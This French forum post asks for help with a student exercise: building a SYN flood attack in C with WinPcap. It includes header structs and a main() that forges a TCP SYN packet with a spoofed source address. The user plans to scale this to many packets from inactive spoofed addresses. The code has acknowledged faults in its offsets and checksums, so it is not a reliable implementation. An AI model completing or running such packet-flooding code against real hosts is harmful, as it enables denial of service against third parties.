Bonjour,
dans le cadre d'un exercice,je suis sensé implémenté une attaque SYN flood,
j'ai pas adopté les raw sockets parceque mon windows 7 refuse de les implementer sous visual c++ 6.0,j'ai eu recours à PCAP,et ça fonctionne(pas la paine de le verifier le code PCAP),mais j'aurais plus de travail comme je dois monter la trame ethernet contrairement au RAW sockets,avec pcap j'arrive à envoyer du charabiat,donc je suis bloqué dans la structuration des entetes.voici mon code c'est mal organisé je sais
voilà pour réussir cette attaque je dois forger mes connections TCP avec des adresses ip sources non active et des ports sources divers.mais pour commencer je me concentre pour réussir une seule communication forgée après je travaillerai sur le nombre.
Entetes,et prototypes:
je me demande si je dois calculer le CRC de la trame Ethernet??
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84 #include <stdlib.h> #include <stdio.h> #include <time.h> #include <pcap.h> #include <iostream> #include <fstream> using namespace std; typedef unsigned short u16; typedef unsigned long u32; u16 ip_sum_calc(u16 len_ip_header, u16 buff[]) { u16 word16; u32 sum=0; u16 i; // make 16 bit words out of every two adjacent 8 bit words in the packet // and add them up for (i=0;i<len_ip_header;i=i+2) { word16 =((buff[i]<<8)&0xFF00)+(buff[i+1]&0xFF); sum = sum + (u32) word16; } // take only 16 bits out of the 32 bit sum and add up the carries while (sum>>16) sum = (sum & 0xFFFF)+(sum >> 16); // one's complement the result sum = ~sum; return ((u16) sum); } typedef struct ip_hdr { unsigned char ip_header_len:4; // 4-bit header length (in 32-bit words) normally=5 (Means 20 Bytes may be 24 also) unsigned char ip_version :4; // 4-bit IPv4 version unsigned char ip_tos; // IP type of service unsigned short ip_total_length; // Total length unsigned short ip_id; // Unique identifier unsigned char ip_frag_offset :5; // Fragment offset field beside flags unsigned char ip_more_fragment :1; unsigned char ip_dont_fragment :1; unsigned char ip_reserved_zero :1; unsigned char ip_frag_offset1; //fragment offset unsigned char ip_ttl; // Time to live unsigned char ip_protocol; // Protocol(TCP,UDP etc) unsigned short ip_checksum; // IP checksum unsigned long ip_srcaddr; // Source address unsigned long ip_destaddr; // Source address } IPV4_HDR, *PIPV4_HDR, FAR * LPIPV4_HDR; // TCP header typedef struct tcp_header { unsigned short source_port; // source port unsigned short dest_port; // destination port unsigned int sequence; // sequence number - 32 bits unsigned int ackn owledge; // acknowledgement number - 32 bits unsigned char ns :1; //Nonce Sum Flag Added in RFC 3540. unsigned char reserved_part1:3; //according to rfc unsigned char data_offset:4; /*The number of 32-bit words in the TCP header. This indicates where the data begins. The length of the TCP header is always a multiple of 32 bits.*/ unsigned char fin :1; //Finish Flag unsigned char syn :1; //Synchronise Flag unsigned char rst :1; //Reset Flag unsigned char psh :1; //Push Flag unsigned char ack :1; //Acknowledgement Flag unsigned char urg :1; //Urgent Flag unsigned char ecn :1; //ECN-Echo Flag unsigned char cwr :1; //Congestion Window Reduced Flag //////////////////////////////// unsigned short window; // window unsigned short checksum; // checksum unsigned short urgent_pointer; // urgent pointer } TCP_HDR , *PTCP_HDR , FAR * LPTCP_HDR , TCPHeader , TCP_HEADER; ///////////////////////////////////////////////Ethernet Header typedef struct ethernet_header { UCHAR dest[6]; //Total 48 bits UCHAR source[6]; //Total 48 bits USHORT type; //16 bits }ETHER_HDR , *PETHER_HDR , FAR * LPETHER_HDR , ETHERHeader;
voiçi la main():
voilà çi joint une capture de ma trame forgée.remarquez que certains champs sont faux.
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142 #include "header.h" main() { pcap_if_t *alldevs; pcap_if_t *d; int inum; int i=0; pcap_t *adhandle; char errbuf[PCAP_ERRBUF_SIZE]; u_char buf[1000]; memset (buf, 0, 1000); ///////////////////////////////////////////////////Read Ethernet Header /* Retrieve the device list on the local machine */ if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1) { fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); exit(1); } /* Print the list */ for(d=alldevs; d; d=d->next) { printf("%d. %s", ++i, d->name); if (d->description) printf(" (%s)\n", d->description); else printf(" (No description available)\n"); } if(i==0) { printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); return -1; } printf("Enter the interface number (1-%d):",i); scanf("%d", &inum); if(inum < 1 || inum > i) { printf("\nInterface number out of range.\n"); /* Free the device list */ pcap_freealldevs(alldevs); return -1; } /* Jump to the selected adapter */ for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++); /* Open the output device */ if ( (adhandle= pcap_open(d->name, // name of the device 100, // portion of the packet to capture (only the first 100 bytes) PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode 1000, // read timeout NULL, // authentication on the remote machine errbuf // error buffer ) ) == NULL) { fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name); return -1; } ETHER_HDR *ether_hdr=NULL; IPV4_HDR *v4hdr=NULL; TCP_HDR *tcphdr=NULL; ether_hdr=(ETHER_HDR*)buf; ether_hdr->dest[0]=0x08; ether_hdr->dest[1]=0x76; ether_hdr->dest[2]=0xff; ether_hdr->dest[3]=0x72; ether_hdr->dest[4]=0x80; ether_hdr->dest[5]=0xad; ether_hdr->source[0]=0x00; ether_hdr->source[1]=0x21; ether_hdr->source[2]=0x5D; ether_hdr->source[3]=0xDB; ether_hdr->source[4]=0x80; ether_hdr->source[5]=0x12; ether_hdr->type=htons(0x0800); v4hdr =(IPV4_HDR *)&buf[sizeof(ETHER_HDR)]; //lets point to the ip header portion v4hdr->ip_header_len=5; v4hdr->ip_version=4; v4hdr->ip_tos = 0; v4hdr->ip_total_length = htons ( sizeof(IPV4_HDR) + sizeof(TCP_HDR) ); v4hdr->ip_id = htons(45678); v4hdr->ip_frag_offset = 0; v4hdr->ip_frag_offset1 = 0; v4hdr->ip_reserved_zero = 0; v4hdr->ip_dont_fragment = 1; v4hdr->ip_more_fragment = 0; v4hdr->ip_ttl =255; //v4hdr->ip_protocol = IPPROTO_TCP; v4hdr->ip_protocol = 6; v4hdr->ip_checksum = 0; v4hdr->ip_srcaddr = inet_addr("192.168.1.245"); v4hdr->ip_destaddr = inet_addr("123.123.123.123"); v4hdr->ip_checksum=ip_sum_calc(sizeof(IPV4_HDR),(u16*)&buf); tcphdr = (TCP_HDR *)&buf[sizeof(IPV4_HDR)]; //get the pointer to the tcp header in the packet tcphdr->source_port = htons((rand() % 65535 + 1)); tcphdr->dest_port = htons(80); tcphdr->sequence=0; tcphdr->data_offset=sizeof(TCP_HDR) / 4; tcphdr->cwr=0; tcphdr->ecn=0; tcphdr->urg=0; tcphdr->ack=0; tcphdr->psh=0; tcphdr->rst=0; tcphdr->syn=1; tcphdr->fin=0; tcphdr->ns=1; tcphdr->checksum = 0; tcphdr->checksum=ip_sum_calc(sizeof(TCP_HDR),(u16*)&buf) if (pcap_sendpacket(adhandle, buf, sizeof(TCP_HDR)+sizeof(IPV4_HDR)+sizeof(ETHER_HDR) /* size */) != 0) { fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle)); return -1; } }
Partager